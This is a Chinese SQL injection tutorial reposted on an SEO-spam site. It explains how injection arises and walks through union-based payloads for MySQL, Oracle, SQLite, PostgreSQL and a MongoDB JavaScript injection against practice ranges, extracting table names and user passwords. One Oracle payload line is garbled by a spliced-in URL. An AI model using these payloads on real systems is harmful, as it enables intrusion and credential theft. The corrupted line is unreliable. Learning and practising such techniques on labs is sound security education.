当前位置: 首页 > wzjs >正文

专做外贸的网站网站seo优化公司

专做外贸的网站,网站seo优化公司,链接缩短在线生成器,重庆网站建设选承越知识点: 1、Web攻防-SQL注入-产生原理&应用因素 2、Web攻防-SQL注入-各类数据库类型利用 演示案例-WEB攻防-SQL注入-数据库类型&架构分层&符号干扰 一、数据库知识 1、数据库名,表名,列名,数据 2、自带数据库&…

知识点:
1、Web攻防-SQL注入-产生原理&应用因素
2、Web攻防-SQL注入-各类数据库类型利用
在这里插入图片描述

演示案例-WEB攻防-SQL注入-数据库类型&架构分层&符号干扰

一、数据库知识

1、数据库名,表名,列名,数据

在这里插入图片描述
在这里插入图片描述

2、自带数据库,数据库用户及权限

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

3、数据库敏感函数,默认端口(3306、1521、1433、6379等)

在这里插入图片描述

4、数据库查询方法(增删改查)

在这里插入图片描述

二、SQL注入产生原理

代码中执行的SQL语句存在可控变量导致

在这里插入图片描述

三、影响SQL注入的主要因素

1、数据库类型(权限操作)

在这里插入图片描述

2、数据操作方法(增删改查)

在这里插入图片描述

3、参数数据类型(符号干扰)

在这里插入图片描述

4、参数数据格式(加密编码等)

在这里插入图片描述

5、提交数据方式(数据包部分)

GET注入、POST注入、HTTP头注入

6、有无数据处理(无回显逻辑等)

 延迟注入

四、常见SQL注入的利用过程

1、判断数据库类型
2、判断参数类型及格式
3、判断数据格式及提交
4、判断数据回显及防护
5、获取数据库名,表名,列名
6、获取对应数据及尝试其他利用

五、黑盒/白盒如何发现SQL注入

1、盲对所有参数进行测试
2、整合功能点脑补进行测试
白盒参考后期代码审计课程

六、利用过程

获取数据库名->表名->列名->数据(一般是关键数据,如管理员)

演示案例-WEB攻防-SQL注入-数据库类型&利用过程&发现思路

靶场

http://vulnweb.com/
https://mozhe.cn/Special/SQL_Injection

一、Access:已经基本淘汰 意义不大

二、Mssql

http://vulnweb.com/

三、Mysql

https://mozhe.cn/Special/SQL_Injection
在这里插入图片描述
在这里插入图片描述

参考文章:https://blog.csdn.net/weixin_57524749/article/details/140618103

1、查看当前页面在数据库里的字段数

order by 5

在这里插入图片描述

2、获取数据库名

id=-1 union select 1,database(),3,4

在这里插入图片描述

3、获取表名

id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

4、获取列名

id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'

在这里插入图片描述
在这里插入图片描述

5、获取相关数据

id=-1 union select 1,2,group_concat(id,name,password),4 from StormGroup_member

在这里插入图片描述
在这里插入图片描述

四、Oracle

参考文章:https://blog.csdn.net/A2893992091/article/details/141365829

and 1=2 union select (select distinct owner from all_tables where rownum=1),'2' from dual
and 1=2 union select (select table_name from user_tables where rownum=1),'2' from dual
and 1=2 union select (select table_name from user_tables whehttps://blog.csdn.net/qq_32393893/article/details/1030832401=2 union select (select column_name from all_tab_columns where rownum=1 and table_name='sns_users'),'2' from dual
and 1=2 union select (select column_name from all_tab_columns where rownum=1 and table_name='sns_users' and column_name not in ('USER_NAME')),'2' from dual
and 1=2 union select USER_NAME,USER_PWD from "sns_users"
and 1=2 union select USER_NAME,USER_PWD from "sns_users" where user_name not in ('hu')

五、SQLite

参考文章: https://blog.csdn.net/qq_32393893/article/details/103083240

union select 1,name,sql,4 from sqlite_master limit 0,1

在这里插入图片描述

union select 1,name,password,4 from WSTMart_reg

在这里插入图片描述

六、MongoDB

参考文章:https://blog.csdn.net/m0_75036923/article/details/141364038
在这里插入图片描述

id=1'});return ({title:'1',content:'2

在这里插入图片描述

'});return ({content:tojson(db.getCollectionNames()),title:'1

在这里插入图片描述

'});return ({content:tojson(db.Authority_confidential.find()[0]),title:'

在这里插入图片描述

七、PostgreSQL

参考文章:https://blog.csdn.net/2401_88387979/article/details/144275425

and 1=2 union select 'null',null,null,null
and 1=2 union select null,'null',null,null 
and 1=2 union select null,null,string_agg(datname,','),null from pg_database
and 1=2 union select null,null,string_agg(tablename,','),null from pg_tables where schemaname='public'
and 1=2 union select null,null,string_agg(column_name,','),null from information_schema.columns where table_name='reg_users'
and 1=2 union select null,string_agg(name,','),string_agg(password,','),null from reg_users
http://www.dtcms.com/wzjs/442804.html

相关文章:

  • 上海制作网站的公司十种网络推广的方法
  • 百草味网站建设的活动方案百度竞价推广开户
  • 做直播网站要多少钱厦门百度推广排名优化
  • 怎么用自己的网站做链轮今日小说排行榜
  • 动态网站开发基础教程期末习题莱芜seo
  • 营销型网站建设合同甘肃seo网站
  • 免费做电脑网站cms网站模板
  • 网站全站开发需要学什么汕头seo网络推广服务
  • 如何做网站支付接口头条关键词排名查询
  • 电子商务网站建设有什么认识国外电商平台有哪些
  • 天堂tv在线观看免费seo提升排名
  • 彩票网站怎么样建设wp博客seo插件
  • 昆明做凡科网站百度推广计划
  • 网站幻灯片尺寸设置营销管理培训课程
  • 关于服装的网站规划与设计fifa世界排名最新
  • 简洁中文网站模板怎么让百度收录我的网站
  • 雄安网站建设优化公司汕头seo快速排名
  • 做信息发布类网站seo外链是什么意思
  • 精品网站建设费用磐石网络站长网站大全
  • 物流网站模板广告商对接平台
  • 网站开发需求问卷品牌关键词排名优化怎么做
  • 360如何做免费的网站网络营销的营销方式是什么
  • 自己免费制作app平台seo在线短视频发布页
  • 企业核名查询系统是哪个搜索引擎优化的方法有哪些?
  • 怎么用微信做网站常德网站优化公司
  • 秦皇岛网站建设公司营销软文模板
  • 做网站有没有受骗过今日头条普通版
  • 龙岗 网站建设公司网址怎么注册
  • 中国卫生人才网石家庄seo外包的公司
  • piwigo wordpressseo网络营销推广